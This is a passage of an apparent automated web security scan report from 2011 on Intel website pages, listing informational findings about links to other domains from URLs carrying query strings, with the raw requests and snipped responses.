Path:   /cd/channel/reseller/asmo-na/eng/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/cd/channel/reseller/asmo-na/eng/index.htm?iid=gg_work+home_reseller
The response contains the following links to other domains:
  • http://sales.liveperson.net/hc/56727252/?cmd=file&file=visitorWantsToChat&site=56727252&byhref=1&SESSIONVAR%21skill=NAResellerPrograms-English&imageUrl=http://www.intel.com/plt/cd/channel/channel/irc/images/livechat/eng/
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /cd/channel/reseller/asmo-na/eng/index.htm?iid=gg_work+home_reseller HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Z: G15
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Sat, 05 Feb 2011 23:18:33 GMT
Date: Sat, 05 Feb 2011 23:18:33 GMT
Connection: close
Connection: Transfer-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Length: 47184

...<html xmlns:wsml="urn:org:wsml:2003:html" xmlns:cd="urn:schemas-microsoft-com:xslt" xmlns:str="http://exslt.org/strings" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><head><META http-equiv="Content
...[SNIP]...
<br><a href="http://sales.liveperson.net/hc/56727252/?cmd=file&amp;file=visitorWantsToChat&amp;site=56727252&amp;byhref=1&amp;SESSIONVAR%21skill=NAResellerPrograms-English&amp;imageUrl=http://www.intel.com/plt/cd/channel/channel/irc/images/livechat/eng/" target="chat56727252"><img src="http://chat.intel.com/hc/56727252/?cmd=repstate&amp;site=56727252&amp;channel=web&amp;&amp;ver=1&amp;imageUrl=http://www.intel.com/plt/cd/channel/channel/irc/images/livechat/eng/&amp;skill=NA
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.57. http://www.intel.com/cd/corporate/europe/emea/heb/287256.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /cd/corporate/europe/emea/heb/287256.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/cd/corporate/europe/emea/heb/287256.htm?iid=gg_en_IL+noscript
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr-IL+invrel

Request

GET /cd/corporate/europe/emea/heb/287256.htm?iid=gg_en_IL+noscript HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Z: G03
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Sat, 05 Feb 2011 23:18:22 GMT
Date: Sat, 05 Feb 2011 23:18:22 GMT
Connection: close
Connection: Transfer-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Length: 52418

...<html xmlns:str="http://exslt.org/strings" xmlns:msxsl="urn:schemas-microsoft-com:xslt">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>.......... ..
...[SNIP]...
<li>
<a href="http://www.intc.com/index.cfm?iid=ftr-IL+invrel">........ ..............</a>
...[SNIP]...

17.58. http://www.intel.com/cd/corporate/europe/emea/ukr/364106.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /cd/corporate/europe/emea/ukr/364106.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/cd/corporate/europe/emea/ukr/364106.htm?iid=gg_ru_UA+noscript
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftrUA+invrel

Request

GET /cd/corporate/europe/emea/ukr/364106.htm?iid=gg_ru_UA+noscript HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Z: G07
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Sat, 05 Feb 2011 23:18:22 GMT
Date: Sat, 05 Feb 2011 23:18:22 GMT
Connection: close
Connection: Transfer-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Length: 45955

...<!DOCTYPE html PUBLIC "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd" >
<html xmlns:str="http://exslt.org/strings" xmlns:msxsl="urn:schemas-microsoft-com:xslt">
<head>
<META ht
...[SNIP]...
<li>
<a href="http://www.intc.com/index.cfm?iid=ftrUA+invrel">............... .. ......................</a>
...[SNIP]...

17.59. http://www.intel.com/cd/software/partner/asmo-na/eng/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /cd/software/partner/asmo-na/eng/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/cd/software/partner/asmo-na/eng/index.htm?iid=subhdr+ptr_sw_program
The response contains the following links to other domains:
  • http://twitter.com/softwarepartner
  • http://www.facebook.com/IntelPartner
  • http://www.intc.com/index.cfm
  • http://www.linkedin.com/groups?gid=1794008&trk=hb_side_g
  • http://www.pollmonkey.com/s.asp?c=20005397&z=1244

Request

GET /cd/software/partner/asmo-na/eng/index.htm?iid=subhdr+ptr_sw_program HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Z: G03
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Sat, 05 Feb 2011 23:18:35 GMT
Date: Sat, 05 Feb 2011 23:18:35 GMT
Connection: close
Connection: Transfer-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Length: 35232

...<html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"><link href="http://cache-www.intel.com/plt/cd/software/shared/eng/css/v3.css" rel="stylesheet" type="text/css" xmlns:m
...[SNIP]...
</a><a href="http://twitter.com/softwarepartner"><img title="Twitter" src="/plt/cd/software/images/icons/twitter.gif" height="19" width="23"></a><a href="http://www.facebook.com/IntelPartner"><img title="Facebook" src="/plt/cd/software/images/icons/facebook.gif" height="19" width="23"></a><a href="http://www.linkedin.com/groups?gid=1794008&amp;trk=hb_side_g"><img title="Linkedin" src="/plt/cd/software/images/icons/linkedin.gif" height="19" width="23">
...[SNIP]...
<!-- BEGIN PollMonkey.com Activation Code --><script src="http://www.pollmonkey.com/s.asp?c=20005397&amp;z=1244"></script>
...[SNIP]...
<li class="footer-leftbar-item"><a href="http://www.intc.com/index.cfm">Investor Relations</a>
...[SNIP]...

17.60. http://www.intel.com/cn/business/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /cn/business/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/cn/business/index.htm?iid=gg_zh_CN+noscript
The response contains the following links to other domains:
  • http://www.intc.com/index.cfm?iid=ftr-CN+invrel
  • http://www.miibeian.gov.cn/?iid=ftr-CN+icpnumber

Request

GET /cn/business/index.htm?iid=gg_zh_CN+noscript HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:18:19 GMT
Content-Length: 30860
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <meta name = "language" content = "zh_CN"/>
       <meta http-equiv = "co
...[SNIP]...
<li><a href="http://www.miibeian.gov.cn/?iid=ftr-CN+icpnumber">... ICP ... 09028403 ...</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr-CN+invrel">...............</a>
...[SNIP]...

17.61. http://www.intel.com/consumer/game/desktop/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /consumer/game/desktop/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/consumer/game/desktop/index.htm?iid=subhdr+game_desktop
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /consumer/game/desktop/index.htm?iid=subhdr+game_desktop HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:05 GMT
Content-Length: 30300
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.62. http://www.intel.com/consumer/game/gaming-power.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /consumer/game/gaming-power.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/consumer/game/gaming-power.htm?iid=subhdr+game_power
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /consumer/game/gaming-power.htm?iid=subhdr+game_power HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 34495


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.63. http://www.intel.com/consumer/game/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /consumer/game/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/consumer/game/index.htm?iid=gg_play+home_game
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /consumer/game/index.htm?iid=gg_play+home_game HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54535


